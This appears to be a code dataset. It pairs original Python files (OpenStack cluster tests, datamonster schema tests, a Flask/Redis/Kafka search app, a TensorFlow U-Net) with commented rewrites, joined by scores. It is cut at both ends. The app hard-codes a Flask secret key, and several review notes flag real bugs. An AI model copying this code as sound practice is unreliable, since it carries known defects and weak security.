        self.cmd = osc_clusters.UpgradeCluster(self.app, None)

    def test_cluster_upgrade_pass(self):
        """upgrade() gets the resolved UUID, the template and batch size 1."""
        cluster_template_id = 'TEMPLATE_ID'
        arglist = ['foo', cluster_template_id]
        verifylist = [
            ('cluster', 'foo'),
            ('cluster_template', cluster_template_id),
            ('max_batch_size', 1),
            ('nodegroup', None)
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.cmd.take_action(parsed_args)
        self.clusters_mock.upgrade.assert_called_with(
            "UUID1", cluster_template_id, 1, None
        ) | 0.520253 | 0.257255 |
import pandas as pd
from datamonster_api import DataGroupColumn
def assert_object_matches_data_group(data_group, data_group_obj):
assert data_group_obj["_id"] == data_group.id
assert data_group_obj["name"] == data_group.name
assert len(data_group_obj["columns"]) == len(data_group.columns)
dg_col_name_to_type = {col.name: col.type_ for col in data_group.columns}
for col in data_group_obj["columns"]:
assert col["name"] in dg_col_name_to_type
assert col["type_"] == dg_col_name_to_type[col["name"]]
def test_missing_column_is_missing(data_group):
missing_date_col = pd.DataFrame([
{'number col': 1, 'string col': 'a'},
{'number col': 2, 'string col': 'a'},
])
missing, extra, bad_dates = data_group._validate_schema(missing_date_col)
assert(extra == [])
assert(bad_dates == [])
assert(len(missing) == 1)
assert(str(missing[0]) == str(DataGroupColumn('date col', 'date')))
missing_number_col = pd.DataFrame([
{'date col': '2006-06-06', 'string col': 'a'},
{'date col': '2006-06-06', 'string col': 'a'},
])
missing, extra, bad_dates = data_group._validate_schema(missing_number_col)
assert(extra == [])
assert(bad_dates == [])
assert(len(missing) == 1)
assert(str(missing[0]) == str(DataGroupColumn('number col', 'number')))
missing_string_col = pd.DataFrame([
{'date col': '2006-06-06', 'number col': 1},
{'date col': '2006-06-06', 'number col': 3},
])
missing, extra, bad_dates = data_group._validate_schema(missing_string_col)
assert(extra == [])
assert(bad_dates == [])
assert(len(missing) == 1)
assert(str(missing[0]) == str(DataGroupColumn('string col', 'string')))
def test_bad_dates_not_missing_or_extra(data_group):
bad_date_type = pd.DataFrame([
{'date col': '2006-6-06', 'string col': 'a', 'number col': 1},
{'date col': '2006-06-06', 'string col': 'b', 'number col': 2},
])
missing, extra, bad_dates = data_group._validate_schema(bad_date_type)
assert(len(bad_dates) == 1)
assert(str(bad_dates[0]) == str(DataGroupColumn('date col', 'date')))
assert(missing == [])
assert(extra == [])
def test_bad_number_or_string_type_counted_as_missing_and_extra(data_group):
bad_number_type = pd.DataFrame([
{'date col': '2006-06-06', 'string col': 'a', 'number col': '1'},
{'date col': '2006-06-07', 'string col': 'b', 'number col': '2'},
])
missing, extra, bad_dates = data_group._validate_schema(bad_number_type)
assert(bad_dates == [])
assert(len(missing) == 1)
assert(str(missing[0]) == str(DataGroupColumn('number col', 'number')))
assert(len(extra) == 1)
assert(str(extra[0]) == str(DataGroupColumn('number col', 'string')))
bad_string_type = pd.DataFrame([
{'date col': '2006-06-06', 'string col': 1, 'number col': 1},
{'date col': '2006-06-07', 'string col': 2, 'number col': 2},
])
missing, extra, bad_dates = data_group._validate_schema(bad_string_type)
assert (bad_dates == [])
assert (len(missing) == 1)
assert (str(missing[0]) == str(DataGroupColumn('string col', 'string')))
assert (len(extra) == 1)
assert (str(extra[0]) == str(DataGroupColumn('string col', 'number'))) | datamonster_api/tests/lib/test_data_group.py | import pandas as pd
from datamonster_api import DataGroupColumn
def assert_object_matches_data_group(data_group, data_group_obj):
    """Check that a raw API dict and a DataGroup describe the same group."""
    assert data_group.id == data_group_obj["_id"]
    assert data_group.name == data_group_obj["name"]
    assert len(data_group_obj["columns"]) == len(data_group.columns)
    expected_types = {column.name: column.type_
                      for column in data_group.columns}
    for raw_column in data_group_obj["columns"]:
        assert raw_column["name"] in expected_types
        assert expected_types[raw_column["name"]] == raw_column["type_"]
def test_missing_column_is_missing(data_group):
    """Dropping any one schema column is reported in ``missing`` only.

    For each expected column (date/number/string) a frame is built without
    it; _validate_schema must list exactly that column as missing, with no
    extras and no bad dates.
    """
    missing_date_col = pd.DataFrame([
        {'number col': 1, 'string col': 'a'},
        {'number col': 2, 'string col': 'a'},
    ])
    missing, extra, bad_dates = data_group._validate_schema(missing_date_col)
    assert(extra == [])
    assert(bad_dates == [])
    assert(len(missing) == 1)
    # Columns are compared via str() -- presumably DataGroupColumn does not
    # implement __eq__; TODO confirm.
    assert(str(missing[0]) == str(DataGroupColumn('date col', 'date')))
    missing_number_col = pd.DataFrame([
        {'date col': '2006-06-06', 'string col': 'a'},
        {'date col': '2006-06-06', 'string col': 'a'},
    ])
    missing, extra, bad_dates = data_group._validate_schema(missing_number_col)
    assert(extra == [])
    assert(bad_dates == [])
    assert(len(missing) == 1)
    assert(str(missing[0]) == str(DataGroupColumn('number col', 'number')))
    missing_string_col = pd.DataFrame([
        {'date col': '2006-06-06', 'number col': 1},
        {'date col': '2006-06-06', 'number col': 3},
    ])
    missing, extra, bad_dates = data_group._validate_schema(missing_string_col)
    assert(extra == [])
    assert(bad_dates == [])
    assert(len(missing) == 1)
    assert(str(missing[0]) == str(DataGroupColumn('string col', 'string')))
def test_bad_dates_not_missing_or_extra(data_group):
    """A malformed date value flags the column as bad, not missing/extra."""
    frame_with_bad_date = pd.DataFrame([
        {'date col': '2006-6-06', 'string col': 'a', 'number col': 1},
        {'date col': '2006-06-06', 'string col': 'b', 'number col': 2},
    ])
    missing, extra, bad_dates = data_group._validate_schema(frame_with_bad_date)
    assert len(bad_dates) == 1
    assert str(bad_dates[0]) == str(DataGroupColumn('date col', 'date'))
    assert missing == []
    assert extra == []
def test_bad_number_or_string_type_counted_as_missing_and_extra(data_group):
    """A column with the right name but wrong dtype is reported twice:

    the expected (name, type) pair as missing and the observed
    (name, actual-type) pair as extra.
    """
    bad_number_type = pd.DataFrame([
        {'date col': '2006-06-06', 'string col': 'a', 'number col': '1'},
        {'date col': '2006-06-07', 'string col': 'b', 'number col': '2'},
    ])
    missing, extra, bad_dates = data_group._validate_schema(bad_number_type)
    assert(bad_dates == [])
    assert(len(missing) == 1)
    assert(str(missing[0]) == str(DataGroupColumn('number col', 'number')))
    # String-typed values in the number column surface as an extra
    # ('number col', 'string') entry.
    assert(len(extra) == 1)
    assert(str(extra[0]) == str(DataGroupColumn('number col', 'string')))
    bad_string_type = pd.DataFrame([
        {'date col': '2006-06-06', 'string col': 1, 'number col': 1},
        {'date col': '2006-06-07', 'string col': 2, 'number col': 2},
    ])
    missing, extra, bad_dates = data_group._validate_schema(bad_string_type)
    assert (bad_dates == [])
    assert (len(missing) == 1)
    assert (str(missing[0]) == str(DataGroupColumn('string col', 'string')))
    assert (len(extra) == 1)
    assert (str(extra[0]) == str(DataGroupColumn('string col', 'number'))) | 0.655667 | 0.729869 |
import thread, redis
from kafka import SimpleProducer, KafkaClient
from flask import Flask, session
from flask.ext.session import Session
from query_subscriber import QuerySubscriber
from views import attach_views
from datetime import datetime
def highlight(word):
    """Wrap *word* in an HTML span that renders with a yellow background."""
    return '<span style="background-color: #FFFF00">{0}</span>'.format(word)
class StrawAppBase:
    """Assembles the Flask app for the straw frontend.

    Owns the Redis connection pool, the pub/sub subscriber that fans
    search results out to subscribed users, and the Kafka producer that
    publishes queries.
    """

    def __init__(self, config):
        # Only config["zookeeper_host"] is read here, as the Kafka broker
        # host (port 9092 assumed).
        app = Flask(__name__)
        app.secret_key = 'i love to search full text in real time'
        # attach a redis connection pool
        app.pool = redis.ConnectionPool(host="localhost", port=6379)
        # user -> channels mapping
        app.user_channels = {}
        # how to handle messages that enter the stream from redis pub sub
        def redis_message_handler(msg):
            redis_connection = redis.Redis(connection_pool=app.pool)
            # get channel and content of incoming message
            channel = msg['channel']
            data = msg['data']
            # word highlighting -- TODO: this would be better to do in the search engine!
            # The channel key presumably holds the original query text --
            # verify against the view that registers queries.
            query = redis_connection.get(channel)
            words = list(set(query.split(" ")))
            for w in words:
                # NOTE(review): lowercases the entire message on every
                # replacement pass, not only the matched word.
                data=data.lower().replace(w.lower(), highlight(w.lower()))
            # find users subscribed to this channel
            if app.user_channels.get(channel) is not None:
                for user in app.user_channels.get(channel):
                    redis_connection.lpush(user, data)
            else:
                # no more users for this channel, unsubscribe from it
                # NOTE(review): unsubscribe() is a pub/sub operation; calling
                # it on a plain Redis client looks wrong -- verify.
                redis_connection.unsubscribe(channel)
        # Add Redis query subscriber to app
        app.disp = []
        app.subscriber = QuerySubscriber("localhost", 6379, redis_message_handler)
        # setup kafka producer in the app
        kafka = KafkaClient("{0}:{1}".format(config["zookeeper_host"], 9092))
        app.producer = SimpleProducer(kafka)
        # add the app
        self.app = app

    def clear_user(self, uid):
        """Drop every subscription and stored result for user *uid*."""
        redis_connection = redis.Redis(connection_pool=self.app.pool)
        # print("Trying to clean for user {0}".format(uid))
        # find all the queries to which the user is subscribed
        # and remove them from the subscribers list for each query.
        for qid in redis_connection.lrange(uid+"-queries", 0, -1):
            try:
                self.app.user_channels[qid].remove(uid)
            except KeyError:
                pass
            # NOTE(review): only KeyError is caught; a uid missing from the
            # channel list would raise ValueError -- confirm uids are always
            # present when the channel exists.
        # remove the user-queries
        redis_connection.delete(uid+"-queries")
        # remove the stored results
        redis_connection.delete(uid)
def get_straw_app(config):
base = StrawAppBase(config)
app = base.app
app.clear_user = base.clear_user
attach_views(app)
return app | src/frontend/app/straw_app.py | import thread, redis
from kafka import SimpleProducer, KafkaClient
from flask import Flask, session
from flask.ext.session import Session
from query_subscriber import QuerySubscriber
from views import attach_views
from datetime import datetime
def highlight(word):
return("<span style=\"background-color: #FFFF00\">{0}</span>".format(word))
class StrawAppBase:
def __init__(self, config):
app = Flask(__name__)
app.secret_key = 'i love to search full text in real time'
# attach a redis connection pool
app.pool = redis.ConnectionPool(host="localhost", port=6379)
# user -> channels mapping
app.user_channels = {}
# how to handle messages that enter the stream from redis pub sub
def redis_message_handler(msg):
redis_connection = redis.Redis(connection_pool=app.pool)
# get channel and content of incoming message
channel = msg['channel']
data = msg['data']
# word highlighting -- TODO: this would be better to do in the search engine!
query = redis_connection.get(channel)
words = list(set(query.split(" ")))
for w in words:
data=data.lower().replace(w.lower(), highlight(w.lower()))
# find users subscribed to this channel
if app.user_channels.get(channel) is not None:
for user in app.user_channels.get(channel):
redis_connection.lpush(user, data)
else:
# no more users for this channel, unsubscribe from it
redis_connection.unsubscribe(channel)
# Add Redis query subscriber to app
app.disp = []
app.subscriber = QuerySubscriber("localhost", 6379, redis_message_handler)
# setup kafka producer in the app
kafka = KafkaClient("{0}:{1}".format(config["zookeeper_host"], 9092))
app.producer = SimpleProducer(kafka)
# add the app
self.app = app
def clear_user(self, uid):
redis_connection = redis.Redis(connection_pool=self.app.pool)
# print("Trying to clean for user {0}".format(uid))
# find all the queries to which the user is subscribed
# and remove them from the subscribers list for each query.
for qid in redis_connection.lrange(uid+"-queries", 0, -1):
try:
self.app.user_channels[qid].remove(uid)
except KeyError:
pass
# remove the user-queries
redis_connection.delete(uid+"-queries")
# remove the stored results
redis_connection.delete(uid)
def get_straw_app(config):
base = StrawAppBase(config)
app = base.app
app.clear_user = base.clear_user
attach_views(app)
return app | 0.321141 | 0.097176 |
import os
import numpy as np
import tensorflow as tf
from datetime import datetime
from skimage import img_as_int, io
from unet.unet_components import weight_init, bias_init, conv2d, max_pool, deconv2d, crop_and_copy
from unet.loss import dice_loss
from unet.metrics import mean_iou
from utils import get_imgs_masks, get_batch_data
class UnetModel(object):
    """TF1-style (tf.compat.v1) U-Net for binary image segmentation.

    Builds the graph from placeholders created in __init__ and wraps
    training, prediction and checkpointing around a tf.compat.v1.Session.
    """

    def __init__(self, learning_rate=0.0001, batch_size=2, model_depth=5, conv_ops=2, k_size=3,
                 pool_size=2, feature_maps_root=16, dropout_rate=0.2):
        """
        Initialization
        :param learning_rate: learning rate set for the network
        :param batch_size: batch size of the image
        :param model_depth: the depth of the model, recommended no less than 4 (>= 4)
        :param conv_ops: the convolution block
        :param k_size: kernel size of the filter, default k_size=3
        :param pool_size: pooling size, default = 2
        :param feature_maps_root: the base feature map/channels
        :param dropout_rate: the dropout rate for the network
        """
        # NOTE(review): the placeholder shape hard-codes batch 2 and
        # 512x512x1 inputs instead of using batch_size -- confirm intended.
        self.x = tf.compat.v1.placeholder(dtype=tf.float32, shape=[2, 512, 512, 1], name="x_input")
        self.y = tf.compat.v1.placeholder(dtype=tf.float32, shape=[2, 512, 512, 1], name="y_label")
        self.learning_rate = learning_rate
        self.batch_size = batch_size
        self.model_depth = model_depth
        self.conv_ops = conv_ops
        self.k_size = k_size
        self.pool_size = pool_size
        self.feat_maps_root = feature_maps_root
        # NOTE(review): stored but never used -- the conv2d calls below pass
        # literal rate=0.2 / rate=0.1 instead of self.dropout_rate.
        self.dropout_rate = dropout_rate

    def build_model(self, X):
        """
        the whole training process, accept only one input: X
        :param X: the input image
        :return: output
        """
        # Extraction Path
        convs_rslt = []  # to save intermediate results of each convolution block 2 * conv followed by one maxpool
        for depth in range(self.model_depth):
            print("the down level is: ", depth)
            # Channels double at every level: root, 2*root, 4*root, ...
            feature_maps = 2 ** depth * self.feat_maps_root
            print("Feature maps = ", feature_maps)
            stddev = tf.sqrt(2 / (self.k_size ** 2 * feature_maps))
            convs_temp = []
            # Input is the previous level's pooled output, or X at level 0.
            conv = convs_rslt[depth - 1][1] if convs_rslt else X
            for conv_op in range(self.conv_ops):
                if depth == 0:
                    input_feat_channels = tf.shape(X)[3]
                else:
                    input_feat_channels = tf.shape(convs_rslt[depth - 1][0][1])[3]
                W = weight_init(w_shape=(self.k_size, self.k_size, input_feat_channels, feature_maps), std=stddev)
                b = bias_init(value=0.1, shape=[feature_maps], name="bias_{0}_{1}".format(depth, conv_op))
                # NOTE(review): both branches below do the same thing; the
                # depth==0 split looks redundant -- confirm before merging.
                if depth == 0:
                    conv = conv2d(X=conv, W=W, b=b, rate=0.2)
                    conv = tf.nn.elu(features=conv)
                    print("After convolution: ", conv.shape)
                    convs_temp.append(conv)
                else:
                    conv = conv2d(X=conv, W=W, b=b, rate=0.2)
                    conv = tf.nn.elu(conv)
                    print("After convolution: ", conv.shape)
                    convs_temp.append(conv)
            if depth == self.model_depth - 1:
                # Bottom level: no pooling; its conv output feeds the deconvs.
                rslt_for_deconv = convs_temp[1]
                print("After downsampling, the shape is: ", rslt_for_deconv.shape)
                convs_rslt.append(convs_temp)
            else:
                pool = max_pool(convs_temp[1])
                # X = pool
                print("After max pooling: ", pool.shape)
                print("\n")
                convs_rslt.append(
                    (convs_temp, pool))  # conv_rslt[0][1], conv_rslt[1][1], conv_rslt[2][1], conv_rslt[3][1]
        # Expansive Path
        print("\n")
        deconv_rslt = []
        step = -1
        for depth in range(self.model_depth - 2, -1, -1):
            print("The up level is: ", depth)
            feature_maps = 2 ** (depth + 1) * self.feat_maps_root
            print("the up feature maps are: ", feature_maps)
            stddev = tf.sqrt(2 / (self.k_size ** 2 * feature_maps))
            # conv = X
            # First up-level starts from the bottom conv block; afterwards
            # each level consumes the previous up-level's output.
            conv = convs_rslt[-1][1] if depth == self.model_depth - 2 else deconv_rslt[step][1]
            W_d = weight_init(w_shape=[self.pool_size, self.pool_size, feature_maps // 2, feature_maps], std=stddev)
            # print(W_d.shape)
            b_d = bias_init(value=0.1, shape=[feature_maps // 2], name="up_bias_{0}".format(depth))
            # print(b_d.shape)
            # NOTE(review): b_d is created but never applied to the deconv.
            deconv = deconv2d(conv, W=W_d, strides=self.pool_size)
            # Skip connection: crop the encoder feature map and concatenate.
            concat_deconv_conv = crop_and_copy(convs_rslt[depth][0][1], deconv)
            print("After deconv: ", deconv.shape)
            print("concat result: ", concat_deconv_conv.shape)
            # X = concat_deconv_conv
            convs_temp = []
            for conv_op in range(self.conv_ops):
                b = bias_init(value=0.1, shape=[feature_maps // 2], name="up_bias_{0}_{1}".format(depth, conv_op))
                if conv_op == 0:
                    W = weight_init(w_shape=[self.k_size, self.k_size, feature_maps, feature_maps // 2], std=stddev)
                    conv = conv2d(X=concat_deconv_conv, W=W, b=b, rate=0.2)
                    conv = tf.nn.elu(features=conv)
                    print("Shape of data after upsamling and convolution: ", conv.shape)
                else:
                    W = weight_init(w_shape=[self.k_size, self.k_size, feature_maps // 2, feature_maps // 2], std=stddev)
                    conv = conv2d(X=convs_temp[0], W=W, b=b, rate=0.2)
                    conv = tf.nn.elu(features=conv)
                    print("Shape of data after upsamling and convolution: ", conv.shape)
                # X = conv
                convs_temp.append(conv)
            # print("The length is: ", len(convs_temp))
            deconv_rslt.append(convs_temp)
            step += 1
            print("\n")
        with tf.name_scope("final_output"):
            stddev = tf.sqrt(2 / (self.k_size ** 2 * self.feat_maps_root))
            W = weight_init(w_shape=(1, 1, self.feat_maps_root, 1), std=stddev)
            b = bias_init(value=0.1, shape=[1], name="final_out_bias")
            output = conv2d(X=deconv_rslt[-1][1], W=W, b=b, rate=0.1)
            # Sigmoid -> per-pixel foreground probability.
            output = tf.nn.sigmoid(output, name="sigmoid_out")
            # Stored in a collection so predict() can recover it by name.
            tf.add_to_collection("network_architecture", output)
            print("final output shape", output.shape)
        return output

    def train(self, data_gen, images, labels, n_epochs, n_samples):
        """
        Training unet model
        :param data_gen: data generator to yield image for training
        :param images: the whole dataset of images
        :param labels: the whole dataset of mask images
        :param n_epochs: number of epochs for training
        :param n_samples: total training samples
        :return: None
        """
        # Create logs directory to store training summary of the model
        create_time = datetime.utcnow().strftime("%Y%m%d%H%M%S")
        root_log_dir = "../logs"
        if not os.path.exists(root_log_dir):
            os.mkdir(root_log_dir)
        tf_train_logs = "{}/run-{}".format(root_log_dir, create_time)
        if not os.path.exists(tf_train_logs):
            os.mkdir(tf_train_logs)
        logits = self.build_model(self.x)
        with tf.name_scope("training_op"):
            loss = self.get_loss(y_true=self.y, y_preds=logits, loss_mode="dice_loss")
            optimizer = self.get_optimizer(opt="Adam")
            training_op = optimizer.minimize(loss, name="training_op")
        with tf.name_scope("mean_iou"):
            miou = mean_iou(y_true=self.y, y_pred=logits)
        with tf.name_scope("save_training_summary"):
            loss_summary = tf.compat.v1.summary.scalar(name="Dice_Loss", tensor=loss)
            iou_summary = tf.compat.v1.summary.scalar(name="IOU", tensor=miou)
            file_writer = tf.compat.v1.summary.FileWriter(tf_train_logs, tf.compat.v1.get_default_graph())
        init = tf.compat.v1.global_variables_initializer()
        init_local = tf.compat.v1.local_variables_initializer()
        with tf.compat.v1.Session() as sess:
            init.run()
            init_local.run()
            training_steps_per_epoch = n_samples // self.batch_size
            for epoch in range(n_epochs):
                print("Start training epoch {}".format(epoch + 1))
                total_loss = 0
                for step in range(training_steps_per_epoch):
                    x_batch, y_batch = data_gen(images, labels, step, self.batch_size)
                    loss_val, _ = sess.run([loss, training_op], feed_dict={self.x: x_batch, self.y: y_batch})
                    total_loss += loss_val
                # NOTE(review): IOU and summaries are evaluated on the LAST
                # batch of the epoch only, via extra forward passes.
                train_iou = miou.eval(feed_dict={self.x: x_batch, self.y: y_batch})
                print("Epoch: {:}, Average loss: {:.4f}, Mean IOU: {:.4f}".format(epoch + 1,
                                                                                  total_loss / training_steps_per_epoch,
                                                                                  train_iou))
                print("\n")
                train_loss_summary = loss_summary.eval(feed_dict={self.x: x_batch, self.y: y_batch})
                train_iou_summary = iou_summary.eval(feed_dict={self.x: x_batch, self.y: y_batch})
                file_writer.add_summary(train_loss_summary, epoch)
                file_writer.add_summary(train_iou_summary, epoch)
                # Checkpoint every epoch to the same path; only the last
                # epoch's checkpoint survives.
                _ = self.dump_model(sess, "../models/tf_model.ckpt")
        file_writer.close()

    @staticmethod
    def get_loss(y_true, y_preds, loss_mode="dice_loss"):
        """Build the loss tensor: "dice_loss" or "cross_entropy".

        Raises ValueError for any other loss_mode.
        NOTE(review): build_model already applies a sigmoid to its output,
        so the "cross_entropy" branch (sigmoid_cross_entropy_with_logits)
        would effectively apply a sigmoid twice -- confirm before using it.
        """
        with tf.name_scope("loss"):
            if loss_mode == "dice_loss":
                loss = dice_loss(y_true=y_true, y_pred=y_preds)
            elif loss_mode == "cross_entropy":
                y_true_flattened = tf.reshape(y_true, [-1])
                y_preds_flattened = tf.reshape(y_preds, [-1])
                loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=y_true_flattened,
                                                                              logits=y_preds_flattened))
            else:
                raise ValueError("Unknown Cost Function: %s" % loss_mode)
        return tf.convert_to_tensor(loss)

    def get_optimizer(self, opt="Adam"):
        """Return an "Adam" or "SGD" optimizer using self.learning_rate.

        NOTE(review): an unrecognized opt falls through and raises
        UnboundLocalError rather than a ValueError -- confirm desired.
        """
        with tf.name_scope("optimizer"):
            if opt == "Adam":
                optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=self.learning_rate)
            elif opt == "SGD":
                optimizer = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=self.learning_rate)
        return optimizer

    def predict(self, x_test, y_test, model_path):
        """
        Use to predict batch data so as to get predicted results
        :param x_test: the test images
        :param y_test: the test masks
        :param model_path: the path stores trained model
        :return: predictions (uint8)
        """
        # NOTE(review): plain tf.reset_default_graph() while the rest of the
        # class uses tf.compat.v1 -- this alias may be absent under TF2.
        tf.reset_default_graph()
        with tf.compat.v1.Session() as sess:
            saver = tf.compat.v1.train.import_meta_graph(model_path + ".meta")
            saver.restore(sess, model_path)
            graph = tf.compat.v1.get_default_graph()
            x = graph.get_operation_by_name("x_input").outputs[0]
            # Output tensor stored by build_model under this collection key.
            y = tf.compat.v1.get_collection("network_architecture")[0]
            no_samples = x_test.shape[0]
            predictions = []
            # Trailing samples that do not fill a batch are dropped.
            n_iteration = no_samples // self.batch_size
            for step in range(n_iteration):
                # y_batch is fetched for interface symmetry but not fed.
                x_batch, y_batch = get_batch_data(x_test, y_test, iter_step=step, batch_size=self.batch_size)
                preds = sess.run(y, feed_dict={x: x_batch})
                predictions.append(preds)
        return predictions

    @staticmethod
    def save_images(predictions, segmented_folder):
        """Binarize each batch of predictions at 0.5 and save them as PNGs."""
        if not os.path.exists(segmented_folder):
            os.mkdir(segmented_folder)
        for i, batch_preds in enumerate(predictions):
            # Threshold sigmoid probabilities into {0, 1} masks.
            batch_preds = (batch_preds >= 0.5).astype(np.uint8)
            n_images = batch_preds.shape[0]
            for j in range(n_images):
                img_arr = img_as_int(np.squeeze(batch_preds[j]))
                io.imsave(fname=segmented_folder + "/img_{}_{}.png".format(i, j), arr=img_arr)

    @staticmethod
    def dump_model(sess, model_path):
        """Save the session's variables and return the checkpoint path."""
        saver = tf.compat.v1.train.Saver()
        saved_path = saver.save(sess, model_path)
        print("Model has been saved into disk at path: %s" % saved_path)
        return saved_path

    @staticmethod
    def load_model(sess, model_path):
        """Restore variables into *sess* from the latest checkpoint.

        NOTE(review): the variables are restored from
        latest_checkpoint("./"), not from *model_path* (only its .meta
        graph is imported) -- confirm this is intended.
        """
        saver = tf.compat.v1.train.import_meta_graph(model_path + ".meta")
        saver.restore(sess, tf.compat.v1.train.latest_checkpoint("./"))
        print("Model Loaded!")
if __name__ == "__main__":
    # Smoke-run: train on the local 2D image/mask dataset, then predict and
    # save segmentations.  NOTE(review): predicts on the training set, so
    # results will be optimistic.
    image_folder = "../data/2d_images/"
    masks_folder = "../data/2d_masks/"
    # # tr_paths, v_paths = get_train_val_paths(image_folder, masks_folder)
    images, labels = get_imgs_masks(image_folder, masks_folder)
    # print(images[0].shape)
    no_samples = images.shape[0]
    n_epochs = 10
    unet = UnetModel()
    unet.train(data_gen=get_batch_data, images=images, labels=labels, n_epochs=n_epochs, n_samples=no_samples)
    test_preds = unet.predict(images, labels, "../models/tf_model.ckpt")
    unet.save_images(predictions=test_preds, segmented_folder="./segmented_results") | unet/unet_model.py | import os
import numpy as np
import tensorflow as tf
from datetime import datetime
from skimage import img_as_int, io
from unet.unet_components import weight_init, bias_init, conv2d, max_pool, deconv2d, crop_and_copy
from unet.loss import dice_loss
from unet.metrics import mean_iou
from utils import get_imgs_masks, get_batch_data
class UnetModel(object):
def __init__(self, learning_rate=0.0001, batch_size=2, model_depth=5, conv_ops=2, k_size=3,
pool_size=2, feature_maps_root=16, dropout_rate=0.2):
"""
Initialization
:param learning_rate: learning rate set for the network
:param batch_size: batch size of the image
:param model_depth: the depth of the model, recommended no less than 4 (>= 4)
:param conv_ops: the convolution block
:param k_size: kernel size of the filter, default k_size=3
:param pool_size: pooling size, default = 2
:param feature_maps_root: the base feature map/channels
:param dropout_rate: the dropout rate for the network
"""
self.x = tf.compat.v1.placeholder(dtype=tf.float32, shape=[2, 512, 512, 1], name="x_input")
self.y = tf.compat.v1.placeholder(dtype=tf.float32, shape=[2, 512, 512, 1], name="y_label")
self.learning_rate = learning_rate
self.batch_size = batch_size
self.model_depth = model_depth
self.conv_ops = conv_ops
self.k_size = k_size
self.pool_size = pool_size
self.feat_maps_root = feature_maps_root
self.dropout_rate = dropout_rate
def build_model(self, X):
"""
the whole training process, accept only one input: X
:param X: the input image
:return: output
"""
# Extraction Path
convs_rslt = [] # to save intermediate results of each convolution block 2 * conv followed by one maxpool
for depth in range(self.model_depth):
print("the down level is: ", depth)
feature_maps = 2 ** depth * self.feat_maps_root
print("Feature maps = ", feature_maps)
stddev = tf.sqrt(2 / (self.k_size ** 2 * feature_maps))
convs_temp = []
conv = convs_rslt[depth - 1][1] if convs_rslt else X
for conv_op in range(self.conv_ops):
if depth == 0:
input_feat_channels = tf.shape(X)[3]
else:
input_feat_channels = tf.shape(convs_rslt[depth - 1][0][1])[3]
W = weight_init(w_shape=(self.k_size, self.k_size, input_feat_channels, feature_maps), std=stddev)
b = bias_init(value=0.1, shape=[feature_maps], name="bias_{0}_{1}".format(depth, conv_op))
if depth == 0:
conv = conv2d(X=conv, W=W, b=b, rate=0.2)
conv = tf.nn.elu(features=conv)
print("After convolution: ", conv.shape)
convs_temp.append(conv)
else:
conv = conv2d(X=conv, W=W, b=b, rate=0.2)
conv = tf.nn.elu(conv)
print("After convolution: ", conv.shape)
convs_temp.append(conv)
if depth == self.model_depth - 1:
rslt_for_deconv = convs_temp[1]
print("After downsampling, the shape is: ", rslt_for_deconv.shape)
convs_rslt.append(convs_temp)
else:
pool = max_pool(convs_temp[1])
# X = pool
print("After max pooling: ", pool.shape)
print("\n")
convs_rslt.append(
(convs_temp, pool)) # conv_rslt[0][1], conv_rslt[1][1], conv_rslt[2][1], conv_rslt[3][1]
# Expansive Path
print("\n")
deconv_rslt = []
step = -1
for depth in range(self.model_depth - 2, -1, -1):
print("The up level is: ", depth)
feature_maps = 2 ** (depth + 1) * self.feat_maps_root
print("the up feature maps are: ", feature_maps)
stddev = tf.sqrt(2 / (self.k_size ** 2 * feature_maps))
# conv = X
conv = convs_rslt[-1][1] if depth == self.model_depth - 2 else deconv_rslt[step][1]
W_d = weight_init(w_shape=[self.pool_size, self.pool_size, feature_maps // 2, feature_maps], std=stddev)
# print(W_d.shape)
b_d = bias_init(value=0.1, shape=[feature_maps // 2], name="up_bias_{0}".format(depth))
# print(b_d.shape)
deconv = deconv2d(conv, W=W_d, strides=self.pool_size)
concat_deconv_conv = crop_and_copy(convs_rslt[depth][0][1], deconv)
print("After deconv: ", deconv.shape)
print("concat result: ", concat_deconv_conv.shape)
# X = concat_deconv_conv
convs_temp = []
for conv_op in range(self.conv_ops):
b = bias_init(value=0.1, shape=[feature_maps // 2], name="up_bias_{0}_{1}".format(depth, conv_op))
if conv_op == 0:
W = weight_init(w_shape=[self.k_size, self.k_size, feature_maps, feature_maps // 2], std=stddev)
conv = conv2d(X=concat_deconv_conv, W=W, b=b, rate=0.2)
conv = tf.nn.elu(features=conv)
print("Shape of data after upsamling and convolution: ", conv.shape)
else:
W = weight_init(w_shape=[self.k_size, self.k_size, feature_maps // 2, feature_maps // 2], std=stddev)
conv = conv2d(X=convs_temp[0], W=W, b=b, rate=0.2)
conv = tf.nn.elu(features=conv)
print("Shape of data after upsamling and convolution: ", conv.shape)
# X = conv
convs_temp.append(conv)
# print("The length is: ", len(convs_temp))
deconv_rslt.append(convs_temp)
step += 1
print("\n")
with tf.name_scope("final_output"):
stddev = tf.sqrt(2 / (self.k_size ** 2 * self.feat_maps_root))
W = weight_init(w_shape=(1, 1, self.feat_maps_root, 1), std=stddev)
b = bias_init(value=0.1, shape=[1], name="final_out_bias")
output = conv2d(X=deconv_rslt[-1][1], W=W, b=b, rate=0.1)
output = tf.nn.sigmoid(output, name="sigmoid_out")
tf.add_to_collection("network_architecture", output)
print("final output shape", output.shape)
return output
    def train(self, data_gen, images, labels, n_epochs, n_samples):
        """
        Training unet model
        :param data_gen: data generator to yield image for training
        :param images: the whole dataset of images
        :param labels: the whole dataset of mask images
        :param n_epochs: number of epochs for training
        :param n_samples: total training samples
        :return: None
        """
        # Create logs directory to store training summary of the model
        create_time = datetime.utcnow().strftime("%Y%m%d%H%M%S")
        root_log_dir = "../logs"
        if not os.path.exists(root_log_dir):
            os.mkdir(root_log_dir)
        tf_train_logs = "{}/run-{}".format(root_log_dir, create_time)
        if not os.path.exists(tf_train_logs):
            os.mkdir(tf_train_logs)
        # Build the graph once; loss/optimizer/metric ops all reference it.
        logits = self.build_model(self.x)
        with tf.name_scope("training_op"):
            loss = self.get_loss(y_true=self.y, y_preds=logits, loss_mode="dice_loss")
            optimizer = self.get_optimizer(opt="Adam")
            training_op = optimizer.minimize(loss, name="training_op")
        with tf.name_scope("mean_iou"):
            miou = mean_iou(y_true=self.y, y_pred=logits)
        with tf.name_scope("save_training_summary"):
            loss_summary = tf.compat.v1.summary.scalar(name="Dice_Loss", tensor=loss)
            iou_summary = tf.compat.v1.summary.scalar(name="IOU", tensor=miou)
            file_writer = tf.compat.v1.summary.FileWriter(tf_train_logs, tf.compat.v1.get_default_graph())
        # Local variables are needed by the streaming mean-IOU metric.
